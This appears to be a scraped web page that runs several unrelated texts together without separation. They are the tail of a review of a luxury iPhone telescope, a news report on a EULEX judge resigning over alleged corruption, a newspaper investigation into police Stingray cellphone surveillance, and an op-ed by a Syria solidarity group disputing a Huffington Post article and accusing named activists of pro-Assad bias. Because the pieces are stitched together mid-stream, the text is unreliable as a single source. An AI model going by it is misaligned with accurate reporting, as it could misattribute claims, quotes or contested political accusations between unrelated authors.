The telescope will set you back $382, putting it on the high-end for the price spectrum of iPhone accessories. If you still think that sounds pretty reasonable, then you may have forgotten to add in the additional $89 shipping fee. It's currently available for preordering, with an expected ship date at the end of June.
By my calculations, I could add a $55 universal smartphone adapter to my $120 Orion 10012 SkyScanner and still have a few hundred bucks left over to blow on freeze-dried astronaut ice cream. But to each her own. There seems to be a plenty big market for luxury iPhone accessories. At least this one is full of science and not just a bunch of bling.
Japan Trend Shop
(Via Luxury Launches)
Grafitti about EULEX in the Kosovar capital Pristina | Armend Nimani/AFP via Getty Images Top judge quits EU Kosovo mission, alleging corruption ‘I don't want to be a part of this farce any more,' Malcolm Simmons says.
The chief judge at an EU organization tasked with improving the rule of law in Kosovo quit and accused other senior members of the mission of corruption and malpractice, Le Monde reported Thursday.
Malcolm Simmons, a British national, said he had denounced "several cases of corruption at the heart of the mission" in recent weeks. He also said the organization, known as EULEX, was subject to political interference.
In an interview with Le Monde, Simmons accused a fellow judge of hacking his email account and sharing his emails with other judges. He also accused the British Foreign Office and the EU of failing to act on his warnings about corruption.
In Brussels, EU foreign policy spokeswoman Maja Kocijančič said: "The EU as well as EULEX operate a zero-tolerance policy towards allegations of inappropriate behavior and all mission members are accountable for their actions.”
Without commenting on ongoing investigations, Kocijancic said: "All allegations … are investigated and, as appropriate, referred to a disciplinary board. Such policy applies irrespective of position in the mission; also to [the] president of EULEX judges."
The 800-person mission is charged with improving Kosovo's judicial and legal systems, by supplying international judges and prosecutors for important cases and mentoring local officials. But Simmons said the mission's real goal was political.
"EULEX is not a mission meant to promote the rule of law. It is a political mission. Anyone who thinks otherwise is naive, stupid," he said, alleging he had come under pressure to convict a Kosovo politician because the mission did not want him to stand in elections.
Simmons also claimed he wrote to the EU's foreign policy chief Federica Mogherini twice to complain about corruption at the mission, but got no response. "For me, this clearly shows how the European Union deals with corruption ... they want to suppress the affair."
"They do nothing," Simmons said, referring to the EU. "I do not want to be a part of this farce anymore."
Often installed in a surveillance vehicle, the suitcase-size Stingrays trick all cellphones in a set distance — sometimes exceeding a mile, depending on the terrain and antennas — into connecting to it as if it were a real cellphone tower. (Photo: Ben Goode)
This year, the Indiana State Police paid $373,995 for a device that law enforcement personnel have described as a powerful tool in the fight against crime and terrorism.
It could allow investigators in a surveillance vehicle to park in a crowded area and track the movements of anyone nearby with a cellphone and capture the numbers of people's incoming and outgoing calls and text messages.
All of which concerns civil liberties and open-government groups.
They worry that the technology could be used to violate innocent Hoosiers' constitutionally protected rights to privacy if proper checks and balances aren't in place.
But officials at Indiana's largest police agency aren't saying what they do with the technology; they're mum on whose data they've collected so far; and they're not talking about what steps they take to safeguard the data.
Citing concerns that releasing any information would endanger public safety by hindering the agency's ability to fight crime and combat terrorism, they won't even say whether they ask a judge for a search warrant before they turn the equipment on.
MORE: Examples of data-gathering abuses
On a national level, police officials at other agencies say that such secrecy is essential to thwart terror attacks and fight crime. Some said the devices are used in extraordinary circumstances, and only to hunt for a single phone at a time, not to collect data from thousands of callers.
But a joint investigation of the Indianapolis Star and USA Today found instances in which police in some cities across the U.S. used cellphone snooping techniques in less urgent and more questionable ways.
MORE: Cell data dumps: A legally fuzzy area
In one case, a South Carolina sheriff obtained cellphone data from an unknown number of people — just to investigate a rash of car burglaries that included the theft of guns from the sheriff's SUV.
In another instance, Miami police told the city council they intended to collect cellphone data to track protesters at a world trade event.
Civil liberties groups say that giving police the authority to secretly collect bulk cellphone data has unprecedented potential for abuse. Searching cellphone data, they say, ought to require a warrant as is required to search a home or a car.
INVESTIGATION: How we did it
When presented with The Star's and USA Today's findings, Gerry Lanosga of the Indiana Coalition for Open Government said police should be required to provide at least some information about how the technology is being used. Are, he asked, Indiana police agencies using the devices for routine investigations? Or, of more concern to him, might it be used to monitor political activities, such as a tea party rally or a racially sensitive cultural event, such as Indianapolis' Black Expo? If a suspect walks into a crowded mall, he wonders, are police grabbing — and keeping — data from innocent shoppers?
"I think the public has a right to know some details about that program," said Lanosga, whose group advocates for government transparency.
Stingray devices
NEWSLETTERS Get the Breaking News newsletter delivered to your inbox We're sorry, but something went wrong Urgent developments you should know now, not later. Please try again soon, or contact Customer Service at 1-888-357-7827. Delivery: varies Invalid email address Thank you! You're almost signed up for Breaking News Keep an eye out for an email to confirm your newsletter registration. More newsletters
While most Americans have paid little thought to the fact that their smartphone is a mobile tracking device that broadcasts their location and data about who they're calling and texting, local police agencies have taken sharp notice.
At least 25 police agencies around the country, including the Indiana State Police, have contracts with Harris Corp., of Melbourne, Fla., for devices called Stingrays, according to public records requests filed this fall with 115 police agencies by the Indianapolis Star, USA Today and other media outlets owned by Gannett.
CLOSE The National Security Agency isn't the only government entity secretly collecting data from people's cellphones. Local police are increasingly scooping it up, too.
Often installed in a surveillance vehicle, the suitcase-size Stingrays trick all cellphones in a set distance — sometimes exceeding a mile, depending on the terrain and antennas — into connecting to it as if it were a real cellphone tower. That allows police agencies to capture location data and numbers dialed for calls and text messages from thousands of people at a time.
Local and state police often buy the devices with federal grants aimed at protecting cities from terror attacks, and the devices, originally developed for military and spy agencies, are closely guarded secrets.
The company referred inquires to local police departments, but they're not talking either, in part because Harris requires them to sign nondisclosure agreements.
'Required information'
The Indiana State Police paid Harris $373,995 this spring for a Stingray, but police officials were reluctant to share even that information.
State Police officials initially refused to provide any records related to the agency's contract with Harris or grants they obtained.
After The Star appealed the denial to the Indiana Public Access Counselor, the state's arbiter of public records disputes, the agency provided a one-page purchase order, which provided no clues to how the device works or how and when it may be used.
To receive more information, Public Access Counselor Luke Britt said, The Star would have to sue the State Police to see if a judge agreed with police that releasing the complete contract would constitute a public safety threat and harm the agency's ability to investigate terrorists.
State Police spokesman Dave Bursten declined to be interviewed or answer written questions about how the device is used, nor would he say what steps his agency takes to protect personal information.
"In accordance with the guidance of Indiana's Public Access Counselor," Bursten said in an email, "the state police has provided the required information related to your request and have nothing further to add in response to the inquiry."
The Indianapolis Department of Public Safety also paid Harris $34,800 this spring, but it's not clear what technology the city purchased.
Harris' website says it also sells law enforcement communications systems and remote video surveillance equipment, which the company markets as "a powerful new tool in the public safety arsenal."
The city provided its entire contract with Harris, but the document provided no detail on what the technology was.
Al Larsen, a spokesman for The Department of Public Safety, declined to discuss how his agency uses the Harris technology, saying doing so would "adversely impact our crime-fighting effort."
Indianapolis Division of Homeland Security Chief Gary Coons said that while he didn't know what the Harris technology was and likely couldn't comment on it even if he did, his agency would protect any data from abuse.
For instance, he said, the data and equipment used to collect license plate numbers on local roadways is routinely audited to make sure detectives aren't using the technology for nefarious purposes, such as spying on an ex-girlfriend.
He said detectives know they could face criminal charges for such abuses.
USA Today and The Star also sought records about what are known as "tower dumps," in which police seek court orders requiring cellphone companies to provide investigators with massive amounts of phone data.
State Police officials said they had no such records when The Star asked for any records that might shed light on how many times detectives used such methods.
But officials said they wouldn't have shared the documents if they did keep them, citing a provision in Indiana's records law that gives police agencies discretion to withhold all investigatory files.
Larsen said that any surveillance in Indianapolis is focused on specific targets and is only used if a court order is granted. He said the technology the city uses "does not perform a data-dump function."
"Broad-scale surveillance, including that of a data-related nature, is not currently a tactic we utilize," Larsen said in an email. "And we would only do so in the future if an extreme circumstance drove us to seek an order from the court."
Seeking reassurances of privacy
What most troubles civil liberties groups about Stingrays and tower dumps is that elsewhere in the country, cellphone data often can be obtained with a simple court order — and not a search warrant.
But it's unclear whether the same standard applies in Indiana because local officials wouldn't discuss the matter.
Court orders generally only require detectives to show that the data collected would aid in an investigation, a standard that's much easier to meet than what's required for a search warrant, in which detectives and prosecutors must demonstrate to a judge probable cause, a legal term meaning there is belief a crime occurred.
Kenneth Falk, legal director of the ACLU of Indiana, said the mass collection of cellphone information raises serious and troubling Fourth Amendment questions. The amendment protects citizens' rights to privacy and to be free from government officials searching their homes and other property without probable cause.
He said police should at least be required to have a judge sign a search warrant before getting access to the phone data from potentially hundreds or even thousands of innocent Hoosiers.
Lanosga of the Coalition for Open Government said Indiana police agencies have an obligation to publicly address privacy concerns and explain what checks and balances are in place to protect the data collected.
Both Lanosga and Falk said they didn't want to deny law enforcement the ability of using whatever technology is needed to fight crime and head off terror. But not without limits.
"What sort of reassurances can the agency make to those people their data is being destroyed, not maintained indefinitely, not abused for any purpose?" Lanosga said. "I think there are a lot of serious questions about that that demand the agency publicly address what it's doing with these types of techniques and equipment."
But that's not happening.
"Maybe," Lanosga said, "the legislature can intervene and get some answers."
Read or Share this story: http://indy.st/1dcQ9vO
As members of an organization committed to peace and justice, the Committee in Solidarity with the People of Syria (CISPOS), it was disheartening for us to see an article in Huffington Post that falsely alleges that we are working “in sync with neocon warhawks to produce and sustain a perpetual state of U.S. war.” Coleen Rowley and Margaret Sarfehjooy's article “Selling ‘Peace Groups' on US-Led Wars” does not provide insightful analysis and is constructed on unfounded claims.
The article is fallout from the widespread controversy in the peace movement over how to respond to the brutal war in Syria.
Many anti-war pundits and activists have bought into U.S. propaganda that the U.S. is actively supporting the Syrian rebels to overthrow the Assad regime in Syria. They point to the 1997 Project for a New American Century plan for regime change in Afghanistan, Iraq, Libya and Syria. They believed Hillary Clinton in 2012 when she said the Assad regime must go and that the international community stands with the Syrian people. In fact…the U.S. has given very little training, small weapons, and funds to very few rebel groups. Congress recently dropped $300 million for the Syrian rebels from the defense bill, almost completely cutting what the Syrian opposition already saw as paltry support from the U.S. On the other hand, the CIA has long had a working relationship with Assad, sending him numerous terrorist suspects to torture as part of their rendition program. Assad has provided Israel with a secure border.
Talk with Syrians and you'll learn that U.S. aid was never enough to counter Assad's MiGs, attack helicopters, Scud missiles, heavy tanks, chemical weapons. They repeatedly state that the U.S. bombing of ISIS has helped Assad – the bombing has sometimes targeted groups aligned with anti-Assad forces and never hit the regime. Syrians too initially believed Clinton's promises but have been repeatedly disappointed in the support from the U.S. and the international community.
Syrians will tell you that the people who rose up against Assad in early 2011 were not the traditional opposition leaders that the U.S. had met with. The uprising was indigenous – not foreign terrorists as Assad has claimed.
In the 1980s, peace organizations worked in solidarity with Central Americans who struggled to rid their countries of repressive regimes. We LISTENED to their voices. Today too many activists have NOT listened to Syrians. They have gotten their information from pro-Assad propaganda sites like Global Research, Consortium News, Mint Press, RT (Russian TV), Press TV (Iranian TV). Like Rowley and Sarfehjooy, many in the peace movement interpret the Syrian conflict as the U.S. trying to overthrow the “anti-imperialist” Assad regime. Most Syrians will tell you that is not true.
Rowley and Sarfehjooy disparagingly refer to local Syrian Americans as “expatriates”, dismissing their authority to speak on Syria. Rowley and Sarfehjooy have attacked our Committee in Solidarity with the People of Syria (CISPOS) and Friends for a NonViolent World (FNVW) for hosting events with local Syrian Americans. They claim that FNVW and CISPOS are promoting war by hosting speakers who “demonize” the Syrian government of Bashar Assad and thereby justify U.S. intervention. Nothing could be further from the truth.
Eighteen other Twin Cities church, peace and university groups have hosted the very same local Syrian American speakers as FNVW and CISPOS. These include:
Amnesty International (Minneapolis chapter), Arab American Cultural Institute, Human Rights Program at the University of Minnesota, Al Madinah Cultural Center, French Culture and Language Association, Global Solutions, Northwest Neighbors for Peace, the Carleton community, Minnesota Peace Project, Presbyterian Church of the Apostles, Yale School of Public Health, Arab Film Fest, University of Minnesota's Human Rights Program, Center for Holocaust and Genocide Studies at the University of Minnesota, Middle East Peace Now, St. Luke Presbyterian Church, Minnesota Independent Scholars Program, Mizna.
Are those organizations also complicit in promoting U.S. military intervention? Of course not.
Rowley and Sarfehjooy's organization, Women Against Military Madness, and their frequent co-sponsor, the Anti-War Committee, are the only Twin Cities organizations to hold Syria events without local Syrian Americans. Instead, WAMM's Syria events have featured their own members (who have no Syria expertise), Assad apologist Mother Agnes, and Matar Matar from the pro-Assad Syrian American Forum. They have refused to include any Syria events on their calendar from the above eighteen organizations.
Recently thirteen local Syrian Americans sent a letter to WAMM politely requesting that their November event on Syria (WAMM's fifth event) include a Syrian. They did not receive a response.
U.S. military intervention is NOT the only response to Assad's brutal police state and his monstrous war crimes. FNVW and CISPOS helped organize an International Solidarity Hunger Strike to pressure the UN to allow unhampered access for humanitarian agencies to deliver food to besieged areas of Syria. Noam Chomsky, Norman Finkelstein, Medea Benjamin, Kathy Kelley, Bill Fletcher, Jr. and many other activists endorsed the hunger strike.
These two groups (CISPOS and FNVW) have organized fundraising events for medical aid to Syria. FNVW held an Olives & Herbs lunch in solidarity with starving Syrians who have subsisted on only those foods for months. CISPOS members have gone to anti-U.S. intervention demonstrations with signs that say, “No to U.S. Bombing! Stop Assad's Bombing!” and “No Drones! No Barrel Bombs!” Their recent forum featured Syrian American Mohja Kahf's important, well-researched presentation on nonviolent activism in Syria from the beginnings of the revolution to the present.
The source of the problem is familiar to those with knowledge of the history of sectarian disagreements on the left. The strong condemnations from Rowley and Sarfehjooy's article did not come from a vacuum. For the last three years, the presence of members of the Freedom Road Socialist Organization, a dogmatic Stalinist sect, on WAMM's board and the influence of their ideology has resulted in increased intolerance from the WAMM board towards anyone with a differing viewpoint.
Freedom Road has publicly taken a position in support of the Assad government in Syria. FRSO leader Joe Iosbaker has stated that “the Syrian government ought to be defended”. He traveled to Syria in June as part of a delegation to certify Assad's fraudulent re-election in the midst of the bloodiest war on the planet. Iosbaker returned to claim that he had witnessed democratic elections where Assad was “given the mandate by the people of Syria”.
While WAMM for decades was a respected democratic, feminist organization, its recent actions have abandoned those roots and generated discord within the Twin Cities peace community.
After four years of the Syrian conflict, it is unacceptable for us to say “it's too complicated.” We must not be complicit with the war crimes of the Assad regime by our silence. Listen to Syrians. Learn the facts. We can stand in solidarity with their epic struggle for freedom and dignity AND, at the same time, oppose U.S. military intervention.
For more sources, see Alternative Left Perspectives on Syria.
Rate this: Share this:
Tweet
WhatsApp
Email
Print
Like this: Like Loading... Related
